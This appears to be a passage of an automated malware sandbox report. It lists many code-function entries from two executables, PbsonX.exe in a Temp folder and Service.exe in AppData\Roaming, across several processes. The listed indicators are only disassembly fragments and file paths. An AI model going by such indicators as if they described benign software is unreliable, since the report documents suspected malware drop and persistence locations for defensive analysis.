Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B86E38h 10_2_05B86B40
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B8FDA8h 10_2_05B8FAB0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B8154Eh 10_2_05B81280
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B8B5F0h 10_2_05B8B2F8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B8CDD8h 10_2_05B8CAE0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B8E5C0h 10_2_05B8E2C8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B83506h 10_2_05B83238
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B854F6h 10_2_05B85228
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0092F2EDh 14_2_0092F150
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0092F2EDh 14_2_0092F33C
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0092FAA9h 14_2_0092F7F1
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0224F2EDh 15_2_0224F150
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0224F2EDh 15_2_0224F33C
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0224FAA9h 15_2_0224F800
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 04E8E769h 15_2_04E8E4C0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 04E8E311h 15_2_04E8E068
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 15_2_04E80040
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 15_2_04E80853
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 04E8DEB9h 15_2_04E8DC10
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 04E8F471h 15_2_04E8F1C8
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 04E831E8h 15_2_04E82DCA
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 04E831E8h 15_2_04E82DD0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 04E82C21h 15_2_04E82970
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 04E8F019h 15_2_04E8ED70
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 04E8EBC1h 15_2_04E8E918
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 04E831E8h 15_2_04E83116
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 04E8FD21h 15_2_04E8FA78
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 15_2_04E80673
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 04E8F8C9h 15_2_04E8F620
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 04E8DA61h 15_2_04E8D7B8
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 04E8D609h 15_2_04E8D360
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 04E80D0Dh 15_2_04E80B30
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 04E81697h 15_2_04E80B30
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 04E8D1B1h 15_2_04E8CF08
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 02A2F2EDh 16_2_02A2F150
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 02A2F2EDh 16_2_02A2F33C
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 02A2FAA9h 16_2_02A2F7F1
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0147F2EDh 17_2_0147F150
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0147F2EDh 17_2_0147F33C
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0147FAA9h 17_2_0147F7F1
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CA9280h 17_2_05CA8FB0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CA7EB5h 17_2_05CA7B78
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CA18A1h 17_2_05CA15F8
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CA0FF1h 17_2_05CA0D48
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CAE81Eh 17_2_05CAE550
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CAC82Eh 17_2_05CAC560
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CA6733h 17_2_05CA6488
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then mov esp, ebp 17_2_05CAAC81
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CA0741h 17_2_05CA0498
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CABF0Eh 17_2_05CABC40
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CA3709h 17_2_05CA3460
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CADEFEh 17_2_05CADC30
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CA5A29h 17_2_05CA5780
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CAFA5Eh 17_2_05CAF790
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CADA6Eh 17_2_05CAD7A0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CABA7Eh 17_2_05CAB7B0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CA2A01h 17_2_05CA2758
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CA79C9h 17_2_05CA7720
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CA5179h 17_2_05CA4ED0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CAD14Eh 17_2_05CACE80
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CA2151h 17_2_05CA1EA8
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CA7119h 17_2_05CA6E70
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CAF13Eh 17_2_05CAEE70
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CA48C9h 17_2_05CA4620
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CAECAEh 17_2_05CAE9E0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CACCBEh 17_2_05CAC9F0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CA1449h 17_2_05CA11A0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CAE38Eh 17_2_05CAE0C0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CAC39Eh 17_2_05CAC0D0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CA0B99h 17_2_05CA08F0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CA02E9h 17_2_05CA0040
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CA32B1h 17_2_05CA3008
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CA62D9h 17_2_05CA6030
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CA5E81h 17_2_05CA5BD8
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CA2E59h 17_2_05CA2BB0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CA25A9h 17_2_05CA2300
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CAF5CEh 17_2_05CAF300
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CAD5DEh 17_2_05CAD310
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CA55D1h 17_2_05CA5328
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CAB5EEh 17_2_05CAB320
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CA7571h 17_2_05CA72C8
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CA1CF9h 17_2_05CA1A50
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CA4D21h 17_2_05CA4A78
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05CA6CC1h 17_2_05CA6A18
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0116F2EDh 18_2_0116F154
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0116F2EDh 18_2_0116F33C
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0116F2EDh 18_2_0116F3BF
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0116FAA9h 18_2_0116F7F1
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05659280h 18_2_05658FB0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05657EB5h 18_2_05657B78
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0565C82Eh 18_2_0565C560
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05650FF1h 18_2_05650D48
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0565E81Eh 18_2_0565E550
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 056518A1h 18_2_056515F8
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05653709h 18_2_05653460
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0565BF0Eh 18_2_0565BC40
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0565DEFEh 18_2_0565DC30
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then mov esp, ebp 18_2_0565AC81
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05656733h 18_2_05656488
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then mov esp, ebp 18_2_0565AC90
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05650741h 18_2_05650498
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05652A01h 18_2_05652758
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 056579C9h 18_2_05657720
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0565DA6Eh 18_2_0565D7A0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0565BA7Eh 18_2_0565B7B0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05655A29h 18_2_05655780
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0565FA5Eh 18_2_0565F790
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05657119h 18_2_05656E70
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0565F13Eh 18_2_0565EE70
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 056548C9h 18_2_05654620
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05655179h 18_2_05654ED0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05652151h 18_2_05651EA8
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0565D14Eh 18_2_0565CE80
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0565ECAEh 18_2_0565E9E0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0565CCBEh 18_2_0565C9F0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05651449h 18_2_056511A0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 056502E9h 18_2_05650040
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 056562D9h 18_2_05656030
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 056532B1h 18_2_05653008
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05650B99h 18_2_056508F0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0565E38Eh 18_2_0565E0C0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0565C39Eh 18_2_0565C0D0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0565B5EEh 18_2_0565B320
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 056555D1h 18_2_05655328
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 056525A9h 18_2_05652300
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0565F5CEh 18_2_0565F300
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0565D5DEh 18_2_0565D310
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05655E81h 18_2_05655BD8
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05652E59h 18_2_05652BB0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05654D21h 18_2_05654A78
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05651CF9h 18_2_05651A50
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05656CC1h 18_2_05656A18
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 05657571h 18_2_056572C8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 02EAF2EDh 20_2_02EAF33C
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 02EAF2EDh 20_2_02EAF150
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 02EAFAA9h 20_2_02EAF7F0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 06B831E8h 20_2_06B82DD0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 06B80D0Dh 20_2_06B80B30
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 06B81697h 20_2_06B80B30
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 06B82C21h 20_2_06B82970
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 06B8F8C9h 20_2_06B8F620
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 20_2_06B80673
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 06B8DA61h 20_2_06B8D7B8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 06B8D1B1h 20_2_06B8CF08
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 06B8E769h 20_2_06B8E4C0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 06B8DEB9h 20_2_06B8DC10
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 06B831E8h 20_2_06B82DCB
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 06B8F019h 20_2_06B8ED70
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 06B8FD21h 20_2_06B8FA78
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 06B8D609h 20_2_06B8D360
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 06B8E311h 20_2_06B8E068
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 20_2_06B80853
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 20_2_06B80040
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 06B8F471h 20_2_06B8F1C8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 06B8EBC1h 20_2_06B8E918
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 06B831E8h 20_2_06B83116
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0102F2EDh 21_2_0102F150
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0102F2EDh 21_2_0102F33C
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0102FAA9h 21_2_0102F804
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0223F2EDh 22_2_0223F33C
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0223F2EDh 22_2_0223F150
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0223FAA9h 22_2_0223F804
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 013FF2EDh 23_2_013FF150
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 013FF2EDh 23_2_013FF33C
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 013FFAA9h 23_2_013FF7F1
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 01ACF2EDh 24_2_01ACF150
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 01ACF2EDh 24_2_01ACF33C
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 01ACFAA9h 24_2_01ACF800
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05D631E8h 24_2_05D62DD0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05D631E8h 24_2_05D62DCA
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05D6F019h 24_2_05D6ED70
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05D6E769h 24_2_05D6E4C0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05D6DEB9h 24_2_05D6DC10
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05D6DA61h 24_2_05D6D7B8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05D6D1B1h 24_2_05D6CF08
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 24_2_05D60673
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05D6F8C9h 24_2_05D6F620
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05D6F471h 24_2_05D6F1C8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05D62C21h 24_2_05D62970
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05D631E8h 24_2_05D63116
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05D6EBC1h 24_2_05D6E918
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 24_2_05D60853
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 24_2_05D60040
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05D6E311h 24_2_05D6E068
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05D6D609h 24_2_05D6D360
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05D60D0Dh 24_2_05D60B30
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05D61697h 24_2_05D60B30
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05D6FD21h 24_2_05D6FA78
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 00F4F2EDh 27_2_00F4F150
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 00F4F2EDh 27_2_00F4F33C
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 00F4FAA9h 27_2_00F4F804
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 065B0D0Dh 27_2_065B0B30
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 065B1697h 27_2_065B0B30
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 065B2C21h 27_2_065B2970
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 065B31E8h 27_2_065B2DD0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 065BFD21h 27_2_065BFA78
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 065BF8C9h 27_2_065BF620
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 065BD609h 27_2_065BD360
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 065BD1B1h 27_2_065BCF08
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 065BDA61h 27_2_065BD7B8
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 27_2_065B0040
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 065BE311h 27_2_065BE068
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 065BDEB9h 27_2_065BDC10
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 065BE769h 27_2_065BE4C0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 065BF019h 27_2_065BED70
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 065BEBC1h 27_2_065BE918
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 065B31E8h 27_2_065B3116
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 065B31E8h 27_2_065B2DCA
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 065BF471h 27_2_065BF1C8
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0088F2EDh 28_2_0088F150
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0088F2EDh 28_2_0088F33C
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0088FAA9h 28_2_0088F804
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0283F2EDh 29_2_0283F33C
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0283F2EDh 29_2_0283F150
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0283FAA9h 29_2_0283F804
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0129F2EDh 30_2_0129F150
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0129F2EDh 30_2_0129F33C
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0129FAA9h 30_2_0129F804
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 068E0D0Dh 30_2_068E0B30
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 068E1697h 30_2_068E0B30
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 068E31E8h 30_2_068E2DD0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 068E2C21h 30_2_068E2970
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 068EF8C9h 30_2_068EF620
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 068EFD21h 30_2_068EFA78
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 30_2_068E0673
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 068EDA61h 30_2_068ED7B8
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 068ED1B1h 30_2_068ECF08
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 068ED609h 30_2_068ED360
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 068EE769h 30_2_068EE4C0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 068EDEB9h 30_2_068EDC10
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 30_2_068E0040
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 30_2_068E0853
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 068EE311h 30_2_068EE068
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 068EF471h 30_2_068EF1C8
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 068E31E8h 30_2_068E2DC7
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 068EEBC1h 30_2_068EE918
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 068E31E8h 30_2_068E3116
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 068EF019h 30_2_068EED70
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0318F2EDh 31_2_0318F33C
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0318F2EDh 31_2_0318F150
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 0318FAA9h 31_2_0318F804
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 06FB0D0Dh 31_2_06FB0B30
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 06FB1697h 31_2_06FB0B30
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 06FB31E8h 31_2_06FB2DD0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 06FB2C21h 31_2_06FB2970
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 06FBFD21h 31_2_06FBFA78
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 31_2_06FB0673
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 06FBF8C9h 31_2_06FBF620
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 06FBDA61h 31_2_06FBD7B8
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 06FBD609h 31_2_06FBD360
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 06FBD1B1h 31_2_06FBCF08
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 06FBE769h 31_2_06FBE4C0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 06FBE311h 31_2_06FBE068
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 31_2_06FB0853
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 31_2_06FB0040
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 4x nop then jmp 06FBDEB9h 31_2_06FBDC10
